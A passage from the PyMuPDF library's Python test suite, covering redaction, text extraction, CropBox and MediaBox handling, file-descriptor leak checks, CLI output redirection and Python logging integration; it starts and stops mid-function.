        for y in range(pixmap.height):
            for x in range(pixmap.width):
                p = pixmap.pixel(x, y)
                for i in range(pixmap.n):
                    p_average[i] += p[i]
        for i in range(pixmap.n):
            p_average[i] /= (pixmap.height * pixmap.width)
        return p_average
    page = doc.load_page(0)
    pixel_average_before = average_color(page)
    # redaction rectangle (position and size of the "{sig}" placeholder)
    rx=135.123
    ry=123.56878
    rw=69.8409
    rh=9.46397
    x0 = rx
    y0 = ry
    x1 = rx + rw
    y1 = ry + rh
    rect = pymupdf.Rect(x0, y0, x1, y1)
    font = pymupdf.Font("Helvetica")
    fill_color=(0,0,0)
    page.add_redact_annot(
        quad=rect,
        #text="null",
        fontname=font.name,
        fontsize=12,
        align=pymupdf.TEXT_ALIGN_CENTER,
        fill=fill_color,
        text_color=(1,1,1),
    )
    page.apply_redactions()
    pixel_average_after = average_color(page)
    print(f'pixel_average_before={pixel_average_before!r}')
    print(f'pixel_average_after={pixel_average_after!r}')
    # Before this bug was fixed (MuPDF-1.22):
    # pixel_average_before=[130.864323120088, 115.23577810900859, 92.9268559996174]
    # pixel_average_after=[138.68844553555772, 123.05687162237561, 100.74275056194105]
    # After fix:
    # pixel_average_before=[130.864323120088, 115.23577810900859, 92.9268559996174]
    # pixel_average_after=[130.8889209934799, 115.25722751837269, 92.94327384463327]
    #
    # average color may change only marginally
    for i in range(len(pixel_average_before)):
        diff = pixel_average_before[i] - pixel_average_after[i]
        assert abs(diff) < 0.1
    out = f'{scriptdir}/resources/test2093-out.pdf'
    doc.save(out)
    print(f'Have written to: {out}')


def test_2182():
    """Iterating the annotations of this file must not raise (issue 2182)."""
    print(f'test_2182() started')
    doc = pymupdf.open(f'{scriptdir}/resources/test2182.pdf')
    page = doc[0]
    for annot in page.annots():
        print(annot)
    print(f'test_2182() finished')
def test_2246():
    """
    Test / confirm identical text positions generated by
    * page.insert_text()
    versus
    * TextWriter.write_text()
    ... under varying situations as follows:
    1. MediaBox does not start at (0, 0)
    2. CropBox origin is different from that of MediaBox
    3. Check for all 4 possible page rotations
    The test writes the same text at the same positions using `page.insert_text()`,
    respectively `TextWriter.write_text()`.
    Then extracts the text spans and confirms that they all occupy the same bbox.
    This ensures coincidence of text positions of page.insert_text()
    (which is assumed correct) and TextWriter.write_text().
    """

    def bbox_count(rot):
        """Make a page and insert identical text via different methods.

        Desired page rotation is a parameter. MediaBox and CropBox are chosen
        to be "awkward": MediaBox does not start at (0,0) and CropBox is a
        true subset of MediaBox. Returns the number of distinct span bboxes
        found on the page - should be 1.
        """
        # bboxes of spans on page: same text positions are represented by ONE bbox
        bboxes = set()
        doc = pymupdf.open()
        # prepare a page with desired MediaBox / CropBox peculiarities
        mediabox = pymupdf.paper_rect("letter")
        page = doc.new_page(width=mediabox.width, height=mediabox.height)
        xref = page.xref
        newmbox = list(map(float, doc.xref_get_key(xref, "MediaBox")[1][1:-1].split()))
        newmbox = pymupdf.Rect(newmbox)
        mbox = newmbox + (10, 20, 10, 20)  # shifted MediaBox
        cbox = mbox + (10, 10, -10, -10)  # true subset of the MediaBox
        doc.xref_set_key(xref, "MediaBox", "[%g %g %g %g]" % tuple(mbox))
        # BUG FIX: the key was misspelled "CrobBox", so the CropBox was never
        # actually set and scenario 2 of the docstring went untested.
        doc.xref_set_key(xref, "CropBox", "[%g %g %g %g]" % tuple(cbox))
        # set page to desired rotation
        page.set_rotation(rot)
        page.insert_text((50, 50), "Text inserted at (50,50)")
        tw = pymupdf.TextWriter(page.rect)
        tw.append((50, 50), "Text inserted at (50,50)")
        tw.write_text(page)
        blocks = page.get_text("dict")["blocks"]
        for b in blocks:
            for l in b["lines"]:
                for s in l["spans"]:
                    # store bbox rounded to 3 decimal places
                    bboxes.add(pymupdf.Rect(pymupdf.JM_TUPLE3(s["bbox"])))
        return len(bboxes)  # should be 1!

    # the following tests must all pass
    assert bbox_count(0) == 1
    assert bbox_count(90) == 1
    assert bbox_count(180) == 1
    assert bbox_count(270) == 1
def test_2430():
    """Confirm that multiple font property checks will not destroy Py_None."""
    font = pymupdf.Font("helv")
    for _ in range(1000):
        font.flags


def test_2692():
    """Render clipped pixmaps via page and display list (issue 2692)."""
    document = pymupdf.Document(f'{scriptdir}/resources/2.pdf')
    for page in document:
        clip = pymupdf.Rect(0, 0, 10, 10)
        page.get_pixmap(clip=clip)
        display_list = page.get_displaylist(annots=True)
        # once with an explicit colorspace ...
        display_list.get_pixmap(
            matrix=pymupdf.Identity,
            colorspace=pymupdf.csRGB,
            alpha=False,
            clip=clip,
        )
        # ... and once relying on the default colorspace
        display_list.get_pixmap(
            matrix=pymupdf.Identity,
            alpha=False,
            clip=clip,
        )
def test_2596():
    """Confirm correctly abandoning cache when reloading a page."""
    doc = pymupdf.Document(f"{scriptdir}/resources/test_2596.pdf")
    page = doc[0]
    pix0 = page.get_pixmap()  # render the page
    _ = doc.tobytes(garbage=3)  # save with garbage collection
    # Note this will invalidate cache content for this page.
    # Reloading the page now empties the cache, so rendering
    # will deliver the same pixmap
    page = doc.reload_page(page)
    pix1 = page.get_pixmap()
    assert pix1.samples == pix0.samples
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        # garbage collection of this file emits exactly this warning
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == 'too many indirections (possible indirection cycle involving 24 0 R)'


def test_2730():
    """Ensure identical output across text extractions."""
    doc = pymupdf.open(f"{scriptdir}/resources/test_2730.pdf")
    page = doc[0]
    # character sets of the three extraction variants must coincide
    s1 = set(page.get_text())  # plain text extraction
    s2 = set(page.get_text(sort=True))  # uses "blocks" extraction
    s3 = set(page.get_textbox(page.rect))
    assert s1 == s2
    assert s1 == s3


def test_2553():
    """Ensure identical output across text extractions."""
    verbose = 0
    doc = pymupdf.open(f"{scriptdir}/resources/test_2553.pdf")
    page = doc[0]
    # extract plain text, build set of all characters
    list1 = page.get_text()
    set1 = set(list1)
    # extract text blocks, build set of all characters
    list2 = page.get_text(sort=True)  # internally uses "blocks"
    set2 = set(list2)
    # extract textbox content, build set of all characters
    list3 = page.get_textbox(page.rect)
    set3 = set(list3)
    def show(l):
        # Render extracted text with non-printables shown as hex escapes.
        ret = f'len={len(l)}\n'
        for c in l:
            cc = ord(c)
            if (cc >= 32 and cc < 127) or c == '\n':
                ret += c
            else:
                ret += f' [0x{hex(cc)}]'
        return ret
    if verbose:
        print(f'list1:\n{show(list1)}')
        print(f'list2:\n{show(list2)}')
        print(f'list3:\n{show(list3)}')
    # all sets must be equal
    assert set1 == set2
    assert set1 == set3
    # With mupdf later than 1.23.4, this special page contains no invalid
    # Unicodes.
    #
    if pymupdf.mupdf_version_tuple > (1, 23, 4):
        print(f'Checking no occurrence of 0xFFFD, {pymupdf.mupdf_version_tuple=}.')
        assert chr(0xFFFD) not in set1
    else:
        print(f'Checking occurrence of 0xFFFD, {pymupdf.mupdf_version_tuple=}.')
        assert chr(0xFFFD) in set1


def test_2553_2():
    """No replacement characters may appear in this file's extracted text."""
    doc = pymupdf.open(f"{scriptdir}/resources/test_2553-2.pdf")
    page = doc[0]
    # extract plain text, ensure that there are no 0xFFFD characters
    text = page.get_text()
    if pymupdf.mupdf_version_tuple >= (1, 23, 7):
        assert chr(0xfffd) not in text
    else:
        # Bug not fixed in MuPDF.
        assert chr(0xfffd) in text
def test_2635():
    """Rendering a page before and after cleaning it should yield the same pixmap."""
    doc = pymupdf.open(f"{scriptdir}/resources/test_2635.pdf")
    page = doc[0]
    pix1 = page.get_pixmap()  # pixmap before cleaning
    page.clean_contents()  # clean page
    pix2 = page.get_pixmap()  # pixmap after cleaning
    assert pix1.samples == pix2.samples  # assert equality


def test_resolve_names():
    """Test PDF name resolution."""
    # guard against wrong PyMuPDF architecture version
    if not hasattr(pymupdf.Document, "resolve_names"):
        print("PyMuPDF version does not support resolving PDF names")
        return
    # BUG FIX: the pickle file handle was opened without ever being closed;
    # a context manager releases it deterministically.
    with open(f"{scriptdir}/resources/cython.pickle", "rb") as pickle_in:
        old_names = pickle.load(pickle_in)
    doc = pymupdf.open(f"{scriptdir}/resources/cython.pdf")
    new_names = doc.resolve_names()
    assert new_names == old_names


def test_2777():
    """A fresh page must expose a usable mediabox (issue 2777)."""
    document = pymupdf.Document()
    page = document.new_page()
    print(page.mediabox.width)
def test_2710():
    """Verify cropbox/mediabox/rect and block coordinates of this file."""
    doc = pymupdf.open(f'{scriptdir}/resources/test_2710.pdf')
    page = doc.load_page(0)
    print(f'test_2710(): {page.cropbox=}')
    print(f'test_2710(): {page.mediabox=}')
    print(f'test_2710(): {page.rect=}')
    # Approximate comparisons, tolerating float rounding.
    def numbers_approx_eq(a, b):
        return abs(a-b) < 0.001
    def points_approx_eq(a, b):
        return numbers_approx_eq(a.x, b.x) and numbers_approx_eq(a.y, b.y)
    def rects_approx_eq(a, b):
        return points_approx_eq(a.bottom_left, b.bottom_left) and points_approx_eq(a.top_right, b.top_right)
    def assert_rects_approx_eq(a, b):
        assert rects_approx_eq(a, b), f'Not nearly identical: {a=} {b=}'
    blocks = page.get_text('blocks')
    print(f'test_2710(): {blocks=}')
    assert len(blocks) == 2
    block = blocks[1]
    rect = pymupdf.Rect(block[:4])
    text = block[4]
    print(f'test_2710(): {rect=}')
    print(f'test_2710(): {text=}')
    assert text == 'Text at left page border\n'
    assert_rects_approx_eq(page.cropbox, pymupdf.Rect(30.0, 30.0, 565.3200073242188, 811.9199829101562))
    assert_rects_approx_eq(page.mediabox, pymupdf.Rect(0.0, 0.0, 595.3200073242188, 841.9199829101562))
    print(f'test_2710(): {pymupdf.mupdf_version_tuple=}')
    # page.rect behavior differs between MuPDF versions, hence the branches.
    if pymupdf.mupdf_version_tuple < (1, 23, 5):
        print(f'test_2710(): Not Checking page.rect and rect.')
    elif pymupdf.mupdf_version_tuple < (1, 24.0):
        print(f'test_2710(): Checking page.rect and rect.')
        assert_rects_approx_eq(page.rect, pymupdf.Rect(0.0, 0.0, 535.3200073242188, 781.9199829101562))
        assert_rects_approx_eq(rect, pymupdf.Rect(0.7872352600097656, 64.7560043334961, 124.85531616210938, 78.1622543334961))
    else:
        # 2023-11-05: Currently broken in mupdf master.
        print(f'test_2710(): Not Checking page.rect and rect.')
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        # the test file misses two ExtGState resources; warnings are expected
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == (
                "syntax error: cannot find ExtGState resource 'GS7'\n"
                "syntax error: cannot find ExtGState resource 'GS8'\n"
                "encountered syntax errors; page may not be correct"
                )
def test_2736():
    """Check handling of CropBox changes vis-a-vis a MediaBox with
    negative coordinates."""
    doc = pymupdf.open()
    page = doc.new_page()
    # fake a MediaBox for demo purposes
    doc.xref_set_key(page.xref, "MediaBox", "[-30 -20 595 842]")
    assert page.cropbox == pymupdf.Rect(-30, 0, 595, 862)
    assert page.rect == pymupdf.Rect(0, 0, 625, 862)
    # change the CropBox: shift by (10, 10) in both dimensions. Please note:
    # To achieve this, 10 must be subtracted from 862! y0 must never be negative!
    page.set_cropbox(pymupdf.Rect(-20, 0, 595, 852))
    # get CropBox from the page definition
    assert doc.xref_get_key(page.xref, "CropBox")[1] == "[-20 -10 595 842]"
    assert page.rect == pymupdf.Rect(0, 0, 615, 852)
    # check error detection: this rectangle exceeds the MediaBox on the left,
    # so set_cropbox() must raise (try/else replaces the old flag variables)
    try:
        page.set_cropbox((-35, -10, 595, 842))
    except Exception as e:
        assert str(e) == "CropBox not in MediaBox"
    else:
        assert False, "expected 'CropBox not in MediaBox' exception"
def test_subset_fonts():
    """Confirm subset_fonts is working."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not testing 'test_subset_fonts' in classic.")
        return
    # build a one-page document using the Ubuntu font
    archive = pymupdf.Archive()
    css = pymupdf.css_for_pymupdf_font("ubuntu", archive=archive)
    css += "* {font-family: ubuntu;}"
    document = pymupdf.open()
    page = document.new_page()
    page.insert_htmlbox(
        page.rect, "Just some arbitrary text.", css=css, archive=archive
    )
    document.subset_fonts(verbose=True)
    # a subsetted font carries a tag prefix in its name
    found = any(
        "+Ubuntu#20Regular" in document.xref_object(xref)
        for xref in range(1, document.xref_length())
    )
    assert found is True
def test_2957_1():
    """Text following a redaction must not change coordinates."""
    # test file with redactions
    doc = pymupdf.open(os.path.join(scriptdir, "resources", "test_2957_1.pdf"))
    page = doc[0]
    # search for string that must not move by redactions
    rects0 = page.search_for("6e9f73dfb4384a2b8af6ebba")
    # sort rectangles vertically
    rects0 = sorted(rects0, key=lambda r: r.y1)
    assert len(rects0) == 2  # must be 2 redactions
    page.apply_redactions()
    # reload page to finalize updates
    page = doc.reload_page(page)
    # the two string must retain their positions (except rounding errors)
    rects1 = page.search_for("6e9f73dfb4384a2b8af6ebba")
    rects1 = sorted(rects1, key=lambda r: r.y1)
    assert page.first_annot is None  # make sure annotations have disappeared
    for i in range(2):
        r0 = rects0[i].irect  # take rounded rects
        r1 = rects1[i].irect
        assert r0 == r1


def test_2957_2():
    """Redacted text must not change positions of remaining text."""
    doc = pymupdf.open(os.path.join(scriptdir, "resources", "test_2957_2.pdf"))
    page = doc[0]
    words0 = page.get_text("words")  # all words before redacting
    page.apply_redactions()  # remove/redact the word "longer"
    words1 = page.get_text("words")  # extract words again
    assert len(words1) == len(words0) - 1  # must be one word less
    assert words0[3][4] == "longer"  # just confirm test file is correct one
    del words0[3]  # remove the redacted word from first list
    for i in range(len(words1)):  # compare words
        w1 = words1[i]  # word after redaction
        bbox1 = pymupdf.Rect(w1[:4]).irect  # its IRect coordinates
        w0 = words0[i]  # word before redaction
        bbox0 = pymupdf.Rect(w0[:4]).irect  # its IRect coordinates
        assert bbox0 == bbox1  # must be same coordinates


def test_707560():
    """https://bugs.ghostscript.com/show_bug.cgi?id=707560
    Ensure that redactions also remove characters with an empty width bbox.
    """
    # Make text that will contain characters with an empty bbox.
    greetings = (
        "Hello, World!",  # english
        "Hallo, Welt!",  # german
        "سلام دنیا!",  # persian
        "வணக்கம், உலகம்!",  # tamil
        "สวัสดีชาวโลก!",  # thai
        "Привіт Світ!",  # ucranian
        "שלום עולם!",  # hebrew
        "ওহে বিশ্ব!",  # bengali
        "你好世界!",  # chinese
        "こんにちは世界!",  # japanese
        "안녕하세요, 월드!",  # korean
        "नमस्कार, विश्व !",  # sanskrit
        "हैलो वर्ल्ड!",  # hindi
    )
    text = " ... ".join([g for g in greetings])
    where = (50, 50, 400, 500)
    # lay the text out via a Story and write it to an in-memory PDF
    story = pymupdf.Story(text)
    bio = io.BytesIO()
    writer = pymupdf.DocumentWriter(bio)
    more = True
    while more:
        dev = writer.begin_page(pymupdf.paper_rect("a4"))
        more, _ = story.place(where)
        story.draw(dev)
        writer.end_page()
    writer.close()
    doc = pymupdf.open("pdf", bio)
    page = doc[0]
    text = page.get_text()
    assert text, "Unexpected: test page has no text."
    # redact the full page; afterwards no text may remain
    page.add_redact_annot(page.rect)
    page.apply_redactions()
    assert not page.get_text(), "Unexpected: text not fully redacted."


def test_3070():
    """Updating a link URI and saving must not raise (issue 3070)."""
    with pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_3070.pdf')) as pdf:
        links = pdf[0].get_links()
        links[0]['uri'] = "https://www.ddg.gg"
        pdf[0].update_link(links[0])
        pdf.save(os.path.abspath(f'{__file__}/../../tests/test_3070_out.pdf'))


def test_bboxlog_2885():
    """get_bboxlog() on this file emits a nesting warning (issue 2885)."""
    doc = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_2885.pdf'))
    page=doc[0]
    bbl = page.get_bboxlog()
    if pymupdf.mupdf_version_tuple >= (1, 24, 9):
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == 'invalid marked content and clip nesting'
    # same expectation when layer information is requested
    bbl = page.get_bboxlog(layers=True)
    if pymupdf.mupdf_version_tuple >= (1, 24, 9):
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == 'invalid marked content and clip nesting'
def test_3081():
    '''
    Check Document.close() closes file handles, even if a Page instance exists.

    Strategy: the OS hands out the lowest available file descriptor number, so
    by repeatedly opening/closing a probe file we can observe which fd numbers
    are free before and after document operations.
    '''
    path1 = os.path.abspath(f'{__file__}/../../tests/resources/1.pdf')
    path2 = os.path.abspath(f'{__file__}/../../tests/test_3081-2.pdf')
    rebased = hasattr(pymupdf, 'mupdf')
    import shutil
    import sys
    import traceback
    shutil.copy2(path1, path2)
    # Find next two available fds.
    next_fd_1 = os.open(path2, os.O_RDONLY)
    next_fd_2 = os.open(path2, os.O_RDONLY)
    os.close(next_fd_1)
    os.close(next_fd_2)
    def next_fd():
        # Probe: return the lowest fd number currently available.
        fd = os.open(path2, os.O_RDONLY)
        os.close(fd)
        return fd
    fd1 = next_fd()
    document = pymupdf.open(path2)
    page = document[0]
    fd2 = next_fd()
    document.close()
    if rebased:
        assert document.this is None
        assert page.this is None
    # Accessing a closed document must raise.
    try:
        document.page_count()
    except Exception as e:
        print(f'Received expected exception: {e}')
        #traceback.print_exc(file=sys.stdout)
        assert str(e) == 'document closed'
    else:
        assert 0, 'Did not receive expected exception.'
    fd3 = next_fd()
    # Accessing a page of a closed document must also raise.
    try:
        page.bound()
    except Exception as e:
        print(f'Received expected exception: {e}')
        #traceback.print_exc(file=sys.stdout)
        if rebased:
            assert str(e) == 'page is None'
        else:
            assert str(e) == 'orphaned object: parent is None'
    else:
        assert 0, 'Did not receive expected exception.'
    page = None
    fd4 = next_fd()
    print(f'{next_fd_1=} {next_fd_2=}')
    print(f'{fd1=} {fd2=} {fd3=} {fd4=}')
    print(f'{document=}')
    assert fd1 == next_fd_1
    assert fd2 == next_fd_2 # Checks document only uses one fd.
    assert fd3 == next_fd_1 # Checks no leaked fds after document close.
    assert fd4 == next_fd_1 # Checks no leaked fds after failed page access.
def test_xml():
    """Smoke test: reading XML metadata from a plain PDF must not raise."""
    with pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')) as document:
        document.get_xml_metadata()
def test_3112_set_xml_metadata():
    """Setting XML metadata on a fresh document must not raise (issue #3112)."""
    doc = pymupdf.Document()
    doc.set_xml_metadata('hello world')
def test_archive_3126():
    """pymupdf.Archive() must accept a pathlib.Path directory (issue #3126)."""
    if not hasattr(pymupdf, 'mupdf'):
        print('Not running because known to fail with classic.')
        return
    p = os.path.abspath(f'{__file__}/../../tests/resources')
    # Constructing the Archive is the whole test - it used to raise.
    # (Previously the result was bound to an unused local.)
    pymupdf.Archive(pathlib.Path(p))
def test_3140():
    """Check Page.insert_htmlbox() + subset_fonts() leak no file descriptors.

    We note the lowest free fd before and after the document round-trip; the
    two probes must agree (issue #3140).
    """
    if not hasattr(pymupdf, 'mupdf'):
        print(f'Not running test_3140 on classic, because Page.insert_htmlbox() not available.')
        return
    css2 = ''
    path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
    oldfile = os.path.abspath(f'{__file__}/../../tests/test_3140_old.pdf')
    newfile = os.path.abspath(f'{__file__}/../../tests/test_3140_new.pdf')
    import shutil
    shutil.copy2(path, oldfile)
    def next_fd():
        # Probe: return the lowest fd number currently available.
        fd = os.open(path, os.O_RDONLY)
        os.close(fd)
        return fd
    fd1 = next_fd()
    with pymupdf.open(oldfile) as doc: # open document
        page = doc[0]
        rect = pymupdf.Rect(130, 400, 430, 600)
        CELLS = pymupdf.make_table(rect, cols=3, rows=5)
        shape = page.new_shape() # create Shape
        for i in range(5):
            for j in range(3):
                qtext = "<b>" + "Ques #" + str(i*3+j+1) + ": " + "</b>" # codespell:ignore
                atext = "<b>" + "Ans:" + "</b>" # codespell:ignore
                qtext = qtext + '<br>' + atext
                shape.draw_rect(CELLS[i][j]) # draw rectangle
                page.insert_htmlbox(CELLS[i][j], qtext, css=css2, scale_low=0)
        shape.finish(width=2.5, color=pymupdf.pdfcolor["blue"], )
        shape.commit() # write all stuff to the page
        doc.subset_fonts()
        doc.ez_save(newfile)
    fd2 = next_fd()
    # No fd may have leaked across the whole operation.
    assert fd2 == fd1, f'{fd1=} {fd2=}'
    os.remove(oldfile)
def test_cli():
    """The `pymupdf` console script must be runnable (`pymupdf -h`)."""
    if not hasattr(pymupdf, 'mupdf'):
        print('test_cli(): Not running on classic because of fitz_old.')
        return
    import subprocess
    # shell=True (was shell=1) - run through the shell so PATH lookup applies.
    subprocess.run('pymupdf -h', shell=True, check=True)
def check_lines(expected_regexes, actual):
    '''
    Checks lines in <actual> match regexes in <expected_regexes>.

    Each regex is anchored to a whole line; a trailing empty line is always
    expected when the last regex is non-empty (subprocess output ends with a
    newline). `None` entries in <expected_regexes> are skipped.
    '''
    print(f'check_lines():', flush=1)
    print(f'{expected_regexes=}', flush=1)
    print(f'{actual=}', flush=1)
    def as_lines(value):
        # Strings are split on newlines; the empty string becomes [].
        if not isinstance(value, str):
            return value
        return value.split('\n') if value else list()
    expected_regexes = as_lines(expected_regexes)
    actual = as_lines(actual)
    if expected_regexes and expected_regexes[-1]:
        expected_regexes.append('')  # Always expect a trailing empty line.
    # Drop `None` placeholders and anchor each regex to an entire line.
    expected_regexes = [f'^{rx}$' for rx in expected_regexes if rx is not None]
    print(f'{expected_regexes=}', flush=1)
    for expected_regex_line, actual_line in zip(expected_regexes, actual):
        print(f'    {expected_regex_line=}', flush=1)
        print(f'    {actual_line=}', flush=1)
        assert re.match(expected_regex_line, actual_line)
    assert len(expected_regexes) == len(actual), \
            f'expected/actual lines mismatch: {len(expected_regexes)=} {len(actual)=}.'
def test_cli_out():
    '''
    Check redirection of messages and log diagnostics with environment
    variables PYMUPDF_LOG and PYMUPDF_MESSAGE.

    We run `pymupdf internal` in a subprocess with various settings and check
    its stdout/stderr (or the files/fds it was redirected to) line by line.
    '''
    if not hasattr(pymupdf, 'mupdf'):
        print('test_cli(): Not running on classic because of fitz_old.')
        return
    import platform
    import re
    import subprocess
    # PYMUPDF_USE_EXTRA=0 makes PyMuPDF emit an extra startup diagnostic line.
    log_prefix = None
    if os.environ.get('PYMUPDF_USE_EXTRA') == '0':
        log_prefix = f'.+Using non-default setting from PYMUPDF_USE_EXTRA: \'0\''
    def check(
            expect_out,
            expect_err,
            message=None,
            log=None,
            verbose=0,
            ):
        '''
        Sets PYMUPDF_MESSAGE to `message` and PYMUPDF_LOG to `log`, runs
        `pymupdf internal`, and checks lines stdout and stderr match regexes in
        `expect_out` and `expect_err`. Note that we enclose regexes in `^...$`.
        '''
        env = dict()
        if log:
            env['PYMUPDF_LOG'] = log
        if message:
            env['PYMUPDF_MESSAGE'] = message
        env = os.environ | env
        print(f'Running with {env=}: pymupdf internal', flush=1)
        cp = subprocess.run(f'pymupdf internal', shell=1, check=1, capture_output=1, env=env, text=True)
        if verbose:
            #print(f'{cp.stdout=}.', flush=1)
            #print(f'{cp.stderr=}.', flush=1)
            sys.stdout.write(f'stdout:\n{textwrap.indent(cp.stdout, "    ")}')
            sys.stdout.write(f'stderr:\n{textwrap.indent(cp.stderr, "    ")}')
        check_lines(expect_out, cp.stdout)
        check_lines(expect_err, cp.stderr)
    #
    print(f'Checking default, all output to stdout.')
    check(
            [
                log_prefix,
                'This is from PyMuPDF message[(][)][.]',
                '.+This is from PyMuPDF log[(][)].',
            ],
            '',
            )
    #
    if platform.system() != 'Windows':
        print(f'Checking redirection of everything to /dev/null.')
        check('', '', 'path:/dev/null', 'path:/dev/null')
    #
    print(f'Checking redirection to files.')
    path_out = os.path.abspath(f'{__file__}/../../tests/test_cli_out.out')
    path_err = os.path.abspath(f'{__file__}/../../tests/test_cli_out.err')
    check('', '', f'path:{path_out}', f'path:{path_err}')
    def read(path):
        # Helper: return the entire text content of <path>.
        with open(path) as f:
            return f.read()
    out = read(path_out)
    err = read(path_err)
    check_lines(['This is from PyMuPDF message[(][)][.]'], out)
    check_lines([log_prefix, '.+This is from PyMuPDF log[(][)][.]'], err)
    #
    print(f'Checking redirection to fds.')
    check(
            [
                'This is from PyMuPDF message[(][)][.]',
            ],
            [
                log_prefix,
                '.+This is from PyMuPDF log[(][)].',
            ],
            'fd:1',
            'fd:2',
            )
def test_use_python_logging():
    '''
    Checks pymupdf.use_python_logging().

    Each scenario writes a small Python script to disk, runs it in a
    subprocess, and verifies its stdout/stderr against regexes via
    check_lines().
    '''
    # PYMUPDF_USE_EXTRA=0 makes PyMuPDF emit an extra startup diagnostic line.
    log_prefix = None
    if os.environ.get('PYMUPDF_USE_EXTRA') == '0':
        log_prefix = f'.+Using non-default setting from PYMUPDF_USE_EXTRA: \'0\''
    if os.path.basename(__file__).startswith(f'test_fitz_'):
        # Do nothing, because command `pymupdf` outputs diagnostics containing
        # `pymupdf` which are not renamed to `fitz`, which breaks our checking.
        print(f'Not testing with fitz alias.')
        return
    def check(
        code,
        regexes_stdout,
        regexes_stderr,
        env = None,
    ):
        # Write <code> to a temp script, run it, and check its output.
        code = textwrap.dedent(code)
        path = os.path.abspath(f'{__file__}/../../tests/resources_test_logging.py')
        with open(path, 'w') as f:
            f.write(code)
        command = f'{sys.executable} {path}'
        if env:
            print(f'{env=}.')
            env = os.environ | env
        print(f'Running: {command}', flush=1)
        try:
            cp = subprocess.run(command, shell=1, check=1, capture_output=1, text=True, env=env)
        except Exception as e:
            print(f'Command failed: {command}.', flush=1)
            print(f'Stdout\n{textwrap.indent(e.stdout, "    ")}', flush=1)
            print(f'Stderr\n{textwrap.indent(e.stderr, "    ")}', flush=1)
            raise
        check_lines(regexes_stdout, cp.stdout)
        check_lines(regexes_stderr, cp.stderr)
    print(f'## Basic use of `logging` sends output to stderr instead of default stdout.')
    check(
        '''
        import pymupdf
        pymupdf.message('this is pymupdf.message()')
        pymupdf.log('this is pymupdf.log()')
        pymupdf.set_messages(pylogging=1)
        pymupdf.set_log(pylogging=1)
        pymupdf.message('this is pymupdf.message() 2')
        pymupdf.log('this is pymupdf.log() 2')
        ''',
        [
            log_prefix,
            'this is pymupdf.message[(][)]',
            '.+this is pymupdf.log[(][)]',
        ],
        [
            'this is pymupdf.message[(][)] 2',
            '.+this is pymupdf.log[(][)] 2',
        ],
    )
    print(f'## Calling logging.basicConfig() makes logging output contain <LEVEL>:<name> prefixes.')
    check(
        '''
        import pymupdf
        import logging
        logging.basicConfig()
        pymupdf.set_messages(pylogging=1)
        pymupdf.set_log(pylogging=1)
        pymupdf.message('this is pymupdf.message()')
        pymupdf.log('this is pymupdf.log()')
        ''',
        [
            log_prefix,
        ],
        [
            'WARNING:pymupdf:this is pymupdf.message[(][)]',
            'WARNING:pymupdf:.+this is pymupdf.log[(][)]',
        ],
    )
    print(f'## Setting PYMUPDF_USE_PYTHON_LOGGING=1 makes PyMuPDF use logging on startup.')
    check(
        '''
        import pymupdf
        pymupdf.message('this is pymupdf.message()')
        pymupdf.log('this is pymupdf.log()')
        ''',
        '',
        [
            log_prefix,
            'this is pymupdf.message[(][)]',
            '.+this is pymupdf.log[(][)]',
        ],
        env = dict(
            PYMUPDF_MESSAGE='logging:',
            PYMUPDF_LOG='logging:',
        ),
    )
    print(f'## Pass explicit logger to pymupdf.use_python_logging() with logging.basicConfig().')
    check(
        '''
        import pymupdf
        import logging
        logging.basicConfig()
        logger = logging.getLogger('foo')
        pymupdf.set_messages(pylogging_logger=logger, pylogging_level=logging.WARNING)
        pymupdf.set_log(pylogging_logger=logger, pylogging_level=logging.ERROR)
        pymupdf.message('this is pymupdf.message()')
        pymupdf.log('this is pymupdf.log()')
        ''',
        [
            log_prefix,
        ],
        [
            'WARNING:foo:this is pymupdf.message[(][)]',
            'ERROR:foo:.+this is pymupdf.log[(][)]',
        ],
    )
    print(f'## Check pymupdf.set_messages() pylogging_level args.')
    check(
        '''
        import pymupdf
        import logging
        logging.basicConfig(level=logging.DEBUG)
        logger = logging.getLogger('pymupdf')
        pymupdf.set_messages(pylogging_level=logging.CRITICAL)
        pymupdf.set_log(pylogging_level=logging.INFO)
        pymupdf.message('this is pymupdf.message()')
        pymupdf.log('this is pymupdf.log()')
        ''',
        [
            log_prefix,
        ],
        [
            'CRITICAL:pymupdf:this is pymupdf.message[(][)]',
            'INFO:pymupdf:.+this is pymupdf.log[(][)]',
        ],
    )
def relpath(path, start=None):
    """Drive-change-safe wrapper around os.path.relpath().

    On Windows, os.path.relpath() raises ValueError when `path` and `start`
    are on different drives; fall back to the absolute path in that case.
    """
    try:
        result = os.path.relpath(path, start)
    except ValueError:
        # Only Windows paths can span drives.
        assert platform.system() == 'Windows'
        result = os.path.abspath(path)
    return result
def test_open():
    """Check pymupdf.open() error behaviour for bad filenames/streams/types."""
    if not hasattr(pymupdf, 'mupdf'):
        print('test_open(): not running on classic.')
        return
    if pymupdf.mupdf_version_tuple < (1, 24):
        print('test_open(): not running on mupdf < 1.24.')
        return
    import re
    import textwrap
    import traceback
    resources = relpath(os.path.abspath(f'{__file__}/../../tests/resources'))
    # We convert all strings to use `/` instead of os.sep, which avoids
    # problems with regex's on windows.
    resources = resources.replace(os.sep, '/')
    def check(filename=None, stream=None, filetype=None, exception=None):
        '''
        Checks we receive expected exception if specified.

        `exception` is None (expect success) or an (etype, eregex) pair where
        eregex may be a sequence of regexes to find in order in the traceback.
        '''
        if isinstance(filename, str):
            filename = filename.replace(os.sep, '/')
        if exception:
            etype, eregex = exception
            if isinstance(eregex, (tuple, list)):
                # Treat as sequence of regexes to look for.
                eregex = '.*'.join(eregex)
            try:
                pymupdf.open(filename=filename, stream=stream, filetype=filetype)
            except etype as e:
                text = traceback.format_exc(limit=0)
                text = text.replace(os.sep, '/')
                text = textwrap.indent(text, '    ', lambda line: 1)
                assert re.search(eregex, text, re.DOTALL), \
                        f'Incorrect exception text, expected {eregex=}, received:\n{text}'
                print(f'Received expected exception for {filename=} {stream=} {filetype=}:\n{text}')
            except Exception as e:
                assert 0, \
